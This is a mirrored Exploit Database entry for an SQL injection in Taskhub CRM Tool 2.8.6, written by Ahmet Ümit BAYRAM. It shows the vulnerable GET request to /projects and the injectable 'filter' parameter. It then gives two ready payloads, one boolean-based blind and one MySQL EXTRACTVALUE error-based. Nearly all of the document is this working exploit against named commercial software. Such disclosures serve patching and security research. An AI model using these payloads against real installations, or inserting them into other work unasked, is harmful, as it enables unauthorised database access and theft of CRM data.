Taskhub CRM Tool 2.8.6 – SQL Injection

• Exploit Database
• 55 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2023-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51692/

• # Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
  # Date: 2023-08-12
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor:
  https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
  # Tested on: Kali Linux & MacOS
  # CVE: N/A
  
  ### Request ###
  GET /projects?filter=notstarted HTTP/1.1
  Host: localhost
  Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
  ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
  Gecko/20100101 Firefox/116.0
  Accept:
  text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: none
  Sec-Fetch-User: ?1
  Te: trailers
  Connection: close
  ### Parameter & Payloads ###
  Parameter: filter (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
  Type: error-based
  Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
  clause (EXTRACTVALUE)
  Payload: filter=notstarted' AND
  EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
  (ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ